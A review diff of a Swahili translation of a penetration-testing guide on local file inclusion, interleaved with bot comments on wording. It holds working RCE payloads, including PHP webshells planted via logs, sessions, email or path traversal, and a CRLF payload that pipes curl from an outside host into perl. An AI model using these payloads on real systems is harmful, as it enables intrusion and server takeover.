- Tambua web-exposed directories. Mifano ya kawaida:
- Apache/PHP: `/var/www/html/`
- Tomcat/Jetty: `<tomcat>/webapps/ROOT/` → drop `shell.jsp`
- IIS: `C:\inetpub\wwwroot\` → drop `shell.aspx`
- Tengeneza traversal path inayovunja kutoka kwenye intended storage directory hadi webroot, na jumuisha yaliyomo ya webshell yako.
- Tembelea payload ulioweka na utekeleze amri.
- Tengeneza traversal path inayovunja kutoka directory ya kuhifadhi yaliyokusudiwa hadi webroot, na jumuisha webshell content yako.
- Tembelea payload uliouacha na utekeleze amri.
Vidokezo:
- The vulnerable service that performs the write may listen on a non-HTTP port (e.g., a JMF XML listener on TCP 4004). The main web portal (different port) will later serve your payload.
- Kwenye Java stacks, uandishi huu wa faili mara nyingi hufanywa kwa simple `File`/`Paths` concatenation. Ukosefu wa canonicalisation/allow-listing ndiko kasoro kuu.
- Huduma iliyo vulnerable inayofanya uandikaji inaweza kusikiliza kwenye port isiyo-HTTP (mfano, a JMF XML listener on TCP 4004). Portal kuu ya web (port tofauti) baadaye itahudumia payload yako.
- Katika stacks za Java, uandishi wa faili mara nyingi umefanywa kwa concatenation rahisi ya `File`/`Paths`. Ukosefu wa canonicalisation/allow-listing ndio kasoro kuu.
Generic XML/JMF-style example (product schemas zinatofautiana DOCTYPE/body wrapper haina umuhimu kwa traversal):
Generic XML/JMF-style example (product schemas vary the DOCTYPE/body wrapper is irrelevant for the traversal):
```xml
<?xml version="1.0" encoding="UTF-8"?>
<JMF SenderID="hacktricks" Version="1.3">
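Review bot: the rewritten warning is ungrammatical: "Mbinu hii inahusu matukio ambapo **undhibiti** **njia ya faili** ... lakini hautaona yaliyomo ya faili (kama simu rahisi kwa **`file()`**) lakini yaliyomo hayajaonyeshwa." has "undhibiti" for "unadhibiti" and two "lakini" clauses, the second of which just repeats the first; the replaced line ("... ambapo wewe unadhibiti **file path** ... kwani yaliyomo hayajaonyeshwa") was clearer. Three paragraphs in this hunk also revert to English: "In [**this incredible post**] ... it's explained how a blind path traversal can be abused ...", "When server-side code that ingests/uploads files builds the destination path ..." and "Generic XML/JMF-style example (product schemas vary the DOCTYPE/body wrapper is irrelevant for the traversal):", the last of which has also lost the separator between "vary" and "the". Keep the previous Swahili for all three.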
@ -466,26 +466,26 @@ in.transferTo(out);
</Command>
</JMF>
```
Uimarishaji unaofanya kazi dhidi ya aina hii ya hitilafu:
- Weka njia hadi canonical path na udhibiti kwamba ni mrithi wa saraka ya msingi iliyoorodheshwa.
- Kataa njia yoyote inayojumuisha `..`, absolute roots, au drive letters; pendelea generated filenames.
- Endesha mchakato wa kuandika kama akaunti yenye ruhusa ndogo na tofautisha saraka za kuandika kutoka kwa served roots.
Uimarishaji unaozuia aina hii ya hitilafu:
- Tathmini kuwa path ni canonical na uhakikishe ni subdirectory ya directory ya msingi iliyoorodheshwa.
- Kataa path yoyote yenye `..`, root za absolute, au herufi za drive; pendelea majina ya faili yaliyozalishwa.
- Endesha writer kama akaunti yenye vibali vidogo na gawanya directories za kuandika kutoka kwa served roots.
## Remote File Inclusion
Imeelezewa hapo awali, [**follow this link**](#remote-file-inclusion).
Explained previously, [**follow this link**](#remote-file-inclusion).
### Kupitia faili za logi za Apache/Nginx
### Via Apache/Nginx log file
Iwapo server ya Apache au Nginx iko **vulnerable to LFI** ndani ya include function unaweza kujaribu kufikia **`/var/log/apache2/access.log` or `/var/log/nginx/access.log`**, kuweka ndani ya **user agent** au ndani ya **GET parameter** php shell kama **`<?php system($_GET['c']); ?>`** na ku-include faili hilo
If the Apache or Nginx server is **vulnerable to LFI** inside the include function you could try to access to **`/var/log/apache2/access.log` or `/var/log/nginx/access.log`**, set inside the **user agent** or inside a **GET parameter** a php shell like **`<?php system($_GET['c']); ?>`** and include that file
> [!WARNING]
> Kumbuka kwamba **kama utatumia double quotes** kwa shell badala ya **simple quotes**, double quotes zitabadilishwa kwa string "_**quote;**_", **PHP itatoa kosa** hapo na **hakutakuwa na chochote kingine kitakachotekelezwa**.
> Kumbuka kwamba **if you use double quotes** for the shell instead of **simple quotes**, the double quotes will be modified for the string "_**quote;**_", **PHP will throw an error** there and **nothing else will be executed**.
>
> Pia, hakikisha **unaandika payload kwa usahihi** au PHP itatoa kosa kila mara itakapo jaribu kupakia faili ya log na hautakuwa na fursa ya pili.
> Pia, hakikisha umeandika payload ipasavyo au PHP itatoa kosa kila mara itakapojaribu kupakia log file na hautapata nafasi ya pili.
Hii pia inaweza kufanywa katika logi nyingine lakini **kuwa mwangalifu,** code ndani ya logi inaweza kuwa URL encoded na hii inaweza kuharibu Shell. Header **authorisation "basic"** ina "user:password" katika Base64 na inachanganuliwa ndani ya logi. PHPShell inaweza kuingizwa ndani ya header hii.\
Njia nyingine zinazowezekana za logi:
This could also be done in other logs but **be careful,** the code inside the logs could be URL encoded and this could destroy the Shell. The header **authorisation "basic"** contains "user:password" in Base64 and it is decoded inside the logs. The PHPShell could be inserted inside this header.\
Njia nyingine za log zinazowezekana:
```python
/var/log/apache2/access.log
/var/log/apache/access.log
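Review bot: most of this hunk replaces translated lines with English: "Explained previously, [**follow this link**]", "### Via Apache/Nginx log file", "If the Apache or Nginx server is **vulnerable to LFI** ...", the double-quotes warning ("Kumbuka kwamba **if you use double quotes** for the shell ...") and "This could also be done in other logs but **be careful,** ..." all had Swahili versions on the old side; keep those. In the hardening list, "Tathmini kuwa path ni canonical" says "assess that the path is canonical", but the replaced "Weka njia hadi canonical path na udhibiti kwamba ni mrithi wa saraka ya msingi iliyoorodheshwa" captured the actual control (resolve to the canonical path first, then enforce that it is a descendant of the allow-listed base); "subdirectory" also narrows "descendant" to one level.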
@ -499,18 +499,18 @@ Njia nyingine zinazowezekana za logi:
```
Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
### Kupitia Email
### Kupitia Barua pepe
**Tuma barua** kwa akaunti ya ndani (user@localhost) ikiwa na PHP payload yako kama `<?php echo system($_REQUEST["cmd"]); ?>` na jaribu ku-include barua ya mtumiaji kwa njia kama **`/var/mail/<USERNAME>`** au **`/var/spool/mail/<USERNAME>`**
**Tuma barua pepe** kwa akaunti ya ndani (user@localhost) ambayo ina PHP payload yako kama `<?php echo system($_REQUEST["cmd"]); ?>` na ujaribu kuijumuisha katika barua pepe ya mtumiaji kwa njia kama **`/var/mail/<USERNAME>`** au **`/var/spool/mail/<USERNAME>`**
### Kupitia /proc/*/fd/*
1. Upload a lot of shells (kwa mfano: 100)
2. Include [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD), with $PID = PID ya process (can be brute forced) na $FD ni file descriptor (can be brute forced too)
1. Pakia shells nyingi (kwa mfano: 100)
2. Include [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD), ambapo $PID = PID ya process (can be brute forced) na $FD ni file descriptor (can be brute forced too)
### Kupitia /proc/self/environ
Kama log file, tuma payload katika User-Agent, itaonekana ndani ya /proc/self/environ file
Kama faili ya log, tuma payload kwenye User-Agent; itaonekana ndani ya faili /proc/self/environ
```
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
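Review bot: the two /proc/*/fd/* steps are now Swahili but still leave "Include", "(can be brute forced)" and "(can be brute forced too)" in English in "2. Include [http://example.com/index.php?page=/proc/$PID/fd/$FD] ..., ambapo $PID = PID ya process (can be brute forced) na $FD ni file descriptor (can be brute forced too)"; for consistency with "1. Pakia shells nyingi (kwa mfano: 100)" render them as "Jumuisha" and "(inaweza kukisiwa kwa brute force)".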
@ -521,22 +521,22 @@ Ikiwa unaweza upload faili, ingiza tu shell payload ndani yake (e.g : `<?php sys
```
http://example.com/index.php?page=path/to/uploaded/file.png
```
Ili kufanya faili kusomeka vizuri ni bora kuingiza kwenye metadata ya picha/doc/pdf
Ili kufanya faili iwe rahisi kusomeka, ni bora kuingiza kwenye metadata ya picha/doc/pdf
### Kupitia Zip fie upload
### Kupakia faili la ZIP
Pakia ZIP file inayojumuisha PHP shell iliyobanwa kisha ufikie:
Pakia ZIP file iliyo na PHP shell iliyobanwa, kisha upate ufikiaji:
```python
example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php
```
### Kupitia PHP sessions
Angalia ikiwa tovuti inatumia PHP Session (PHPSESSID)
Angalia kama tovuti inatumia PHP Session (PHPSESSID)
```
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```
Katika PHP vikao hivi vinahifadhiwa ndani ya _/var/lib/php5/sess\\_\[PHPSESSID]\_ mafaili
Katika PHP sessions hizi zinahifadhiwa ndani ya _/var/lib/php5/sess\\_\[PHPSESSID]\_ files
```
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
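Review bot: "### Kupakia faili la ZIP" fixes the "Zip fie" typo but drops the "Kupitia ..." (Via ...) pattern every sibling heading in this section uses ("### Kupitia PHP sessions", "### Kupitia ssh"); "### Kupitia upakiaji wa faili la ZIP" keeps both the fix and the pattern. The `python` tag on the fence that holds only the URL `example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php` is unchanged context but is wrong; `url` or no tag is more accurate.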
@ -551,68 +551,69 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
```
### Kupitia ssh
Ikiwa ssh imewekwa, angalia ni mtumiaji gani anayetumika (/proc/self/status & /etc/passwd) na jaribu kufikia **\<HOME>/.ssh/id_rsa**
Ikiwa ssh iko active, angalia ni user gani anatumika (/proc/self/status & /etc/passwd) na jaribu kufikia **\<HOME>/.ssh/id_rsa**
### **Kupitia** **vsftpd** _**logs**_
### **Kupitia** **vsftpd** _**rejista**_
Logi za server ya FTP vsftpd ziko katika _**/var/log/vsftpd.log**_. Katika tukio ambapo kuna udhaifu wa Local File Inclusion (LFI), na ufikiaji wa server ya vsftpd iliyofichuliwa unapatikana, hatua zifuatazo zinaweza kuzingatiwa:
Rejista za FTP server vsftpd zipo katika _**/var/log/vsftpd.log**_. Katika hali ambapo Local File Inclusion (LFI) vulnerability ipo, na upatikanaji wa server ya vsftpd iliyo wazi unawezawezekana, hatua zifuatazo zinaweza kuzingatiwa:
1. Inject PHP payload kwenye uwanja wa username wakati wa mchakato wa login.
2. Baada ya injection, tumia LFI kupata logi za server kutoka _**/var/log/vsftpd.log**_.
1. Injiza payload ya PHP kwenye uwanja wa username wakati wa mchakato wa login.
2. Baada ya injection, tumia LFI kupata rejista za server kutoka _**/var/log/vsftpd.log**_.
### Kupitia php base64 filter (using base64)
### Kupitia php base64 filter (kutumia base64)
Kama inavyoonyeshwa katika [this](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) article, PHP base64 filter huvipuuza vitu visivyo-base64. Unaweza kutumia hilo kupita ukaguzi wa file extension: ikiwa utatoa base64 inayomalizika na ".php", itapuuza "." na kuongeza "php" kwenye base64. Hapa kuna mfano wa payload:
Kama inavyoonyeshwa katika [this](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) makala, PHP base64 filter huwapuuza wahusika wasiokuwa base64. Unaweza kutumia hilo kupita ukaguzi wa extension ya faili: ukitoa base64 inayomalizika na ".php", itapuuza "." na kuongeza "php" kwenye base64. Hapa kuna payload ya mfano:
```url
http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
```
### Via php filters (hakuna faili inahitajika)
### Kupitia php filters (hakuna faili inahitajika)
This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file.
Hii [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) inaeleza kwamba unaweza kutumia **php filters to generate arbitrary content** kama matokeo. Ambayo kwa msingi inamaanisha kwamba unaweza **generate arbitrary php code** kwa include **without needing to write** it into a file.
{{#ref}}
lfi2rce-via-php-filters.md
{{#endref}}
### Via segmentation fault
### Kupitia segmentation fault
**Pakia** faili itakayohifadhiwa kama **temporary** katika `/tmp`, kisha katika **request moja hiyo,** chochea **segmentation fault**, na basi **faili ya muda haitaondolewa** na unaweza kuitafuta.
Pakia faili itakayohifadhiwa kama ya muda katika /tmp, kisha katika request ileile, chochea segmentation fault, na basi faili ya muda haitafutwa na unaweza kuitafuta.
{{#ref}}
lfi2rce-via-segmentation-fault.md
{{#endref}}
### Via Nginx temp file storage
### Kupitia Nginx temp file storage
Ikiwa umepata Local File Inclusion na Nginx inaendesha mbele ya PHP unaweza kuweza kupata RCE kwa mbinu ifuatayo:
Ikiwa umepata **Local File Inclusion** na **Nginx** inaendesha mbele ya PHP unaweza kupata RCE kwa mbinu ifuatayo:
{{#ref}}
lfi2rce-via-nginx-temp-files.md
{{#endref}}
### Via PHP_SESSION_UPLOAD_PROGRESS
### Kupitia PHP_SESSION_UPLOAD_PROGRESS
Ikiwa umepata Local File Inclusion hata kama huna session na `session.auto_start` iko `Off`. Ikiwa utatoa `PHP_SESSION_UPLOAD_PROGRESS` katika multipart POST data, PHP itawasha session kwa ajili yako. Unaweza kutumia vibaya hii kupata RCE:
Kama umepata **Local File Inclusion** hata kama **huna session** na `session.auto_start` iko `Off`. Ikiwa utatoa **`PHP_SESSION_UPLOAD_PROGRESS`** katika data ya **multipart POST**, PHP itafungua/itawezisha session kwako. Unaweza kutumia hili kupata RCE:
{{#ref}}
via-php_session_upload_progress.md
{{#endref}}
### Via temp file uploads in Windows
### Kupitia temp file uploads katika Windows
Ikiwa umepata Local File Inclusion na server inaendesha kwenye Windows unaweza kupata RCE:
Ikiwa umepata **Local File Inclusion** na server inaendesha kwenye **Windows** unaweza kupata RCE:
{{#ref}}
lfi2rce-via-temp-file-uploads.md
{{#endref}}
### Via `pearcmd.php` + URL args
### Kupitia `pearcmd.php` + URL args
As [**explained in this post**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), the script `/usr/local/lib/phppearcmd.php` exists by default in php docker images. Moreover, it's possible to pass arguments to the script via the URL because it's indicated that if a URL param doesn't have an `=`, it should be used as an argument. See also [watchTowrs write-up](https://labs.watchtowr.com/form-tools-we-need-to-talk-about-php/) and [Orange Tsais “Confusion Attacks”](https://blog.orange.tw/posts/2024-08-confusion-attacks-en/).
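Review bot: the new translation of the php-filters paragraph (the line starting `Hii [**writeup** ](...)`) is only half translated, switching back to English mid-sentence ("unaweza **generate arbitrary php code** kwa include **without needing to write** it into a file"), while the old line kept the same mix; translate the whole sentence in one language and drop the stray space inside `[**writeup** ]` so the link text renders cleanly. In the same hunk the rewritten segmentation-fault paragraph ("Pakia faili itakayohifadhiwa kama ya muda katika /tmp, ...") silently drops the bold emphasis and the backticks around `/tmp` that its predecessor and the neighbouring paragraphs keep; keep the formatting consistent with the rest of the section, and note that the `pearcmd.php` paragraph that closes the hunk is still entirely in English.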
@ -620,7 +621,7 @@ The following request create a file in `/tmp/hello.php` with the content `<?=php
```bash
GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
```
Ifuatayo inatumia CRLF vuln kupata RCE (kutoka [**here**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1)):
Ifuatayo inatumia CRLF vuln ili kupata RCE (kutoka [**here**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1)):
```
http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
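Review bot: the CRLF line's link (`https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1`) points at the same Orange Tsai post that the pearcmd.php paragraph already links as `https://blog.orange.tw/posts/2024-08-confusion-attacks-en/`; pick one canonical URL so readers are not sent to two addresses for one source. Minor: the request example just above is fenced as ```bash while the multi-line block that follows is an untagged fence; tagging both the same way keeps rendering consistent.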
@ -629,7 +630,7 @@ Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php
```
### Kupitia phpinfo() (file_uploads = on)
Ikiwa umegundua **Local File Inclusion** na faili inayofichua **phpinfo()** yenye file_uploads = on unaweza kupata RCE:
Ikiwa umepata **Local File Inclusion** na faili inayofichua **phpinfo()** na file_uploads = on, unaweza kupata RCE:
{{#ref}}
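Review bot: in both the old and new phpinfo() lines the ini setting `file_uploads = on` is plain text, whereas the same page writes `session.auto_start` in backticks in the PHP_SESSION_UPLOAD_PROGRESS paragraph; format it as code here too (and in the heading "Kupitia phpinfo() (file_uploads = on)") so the setting name is recognisable as a configuration key rather than prose.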
@ -638,7 +639,7 @@ lfi2rce-via-phpinfo.md
### Kupitia compress.zlib + `PHP_STREAM_PREFER_STUDIO` + Path Disclosure
Ikiwa umegundua **Local File Inclusion** na unaweza **exfiltrate the path** ya faili ya muda LAKINI **server** inakagua kama **faili itakayojumuishwa ina PHP marks**, unaweza kujaribu **bypass that check** kwa kutumia **Race Condition**:
Ikiwa umepata **Local File Inclusion** na unaweza **exfiltrate the path** ya temp file, LAKINI **server** inafanya **checking** ikiwa **file to be included has PHP marks**, unaweza kujaribu **bypass that check** kwa kutumia **Race Condition**:
{{#ref}}
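Review bot: the replacement line regresses the translation, turning the old fully Swahili clause "server inakagua kama faili itakayojumuishwa ina PHP marks" into a mixed-language one ("server inafanya **checking** ikiwa **file to be included has PHP marks**"); keep the old wording, or translate the whole sentence, rather than re-importing English fragments. The unchanged heading above it also carries an untranslated "Path Disclosure" while the body is in Swahili; worth aligning in the same pass.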
@ -647,7 +648,7 @@ lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
### Kupitia eternal waiting + bruteforce
Ikiwa unaweza kutumia LFI kuabuse ili **upload temporary files** na kufanya server **hang** utekelezaji wa PHP, basi unaweza kisha **brute force filenames kwa masaa** ili kupata faili ya muda:
Ikiwa unaweza kutumia LFI ili **upload temporary files** na kuifanya server **hang** utekelezaji wa PHP, unaweza kisha **brute force filenames during hours** ili kupata temporary file:
{{#ref}}
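Review bot: same regression here: "brute force filenames during hours" replaces the old "brute force filenames kwa masaa", reintroducing an English phrase that is not even idiomatic in English ("for hours" would be). Keep the earlier translation; the rest of the sentence change ("kuifanya server hang utekelezaji wa PHP") also leaves "hang" dangling between two Swahili words and reads less clearly than "kufanya server hang" did.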
@ -656,13 +657,14 @@ lfi2rce-via-eternal-waiting.md
### Kwa Fatal Error
Ikiwa unajumuisha yoyote ya faili `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar`. (Unahitaji kujumuisha ile ile mara 2 ili kusababisha error hiyo).
Ikiwa una-include yoyote ya faili `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar`. (Unahitaji kujumuisha ile ile mara 2 ili kusababisha error hiyo).
**Sijui jinsi hili linavyoweza kuwa na manufaa lakini linaweza kuwa.**\
_Hata kama unasababisha PHP Fatal Error, PHP temporary files uploaded zinafutwa._
**Sijui jinsi hii inavyoweza kuwa muhimu, lakini inaweza kuwa.**\
_Hata kama unasababisha PHP Fatal Error, PHP temporary files zilizouppload zinafutwa._
<figure><img src="../../images/image (1031).png" alt=""><figcaption></figcaption></figure>
## Marejeo
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)
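Review bot: the new line "_Hata kama unasababisha PHP Fatal Error, PHP temporary files zilizouppload zinafutwa._" has a typo, "zilizouppload" with a doubled p; also the heading "### Kwa Fatal Error" is the only "Via ..." heading in the section not rendered as "Kupitia ...", so it should match. Both versions of the first sentence ("Ikiwa una-include yoyote ya faili ... (Unahitaji kujumuisha ile ile mara 2 ili kusababisha error hiyo).") are a conditional with no main clause, so the reader is never told what the outcome of the error is; the sentence needs completing from the upstream source, not guessing. Finally the figure line carries an empty `alt=""` and an empty `<figcaption>`, which leaves the image meaningless in text-only rendering; add a short description of what the screenshot shows.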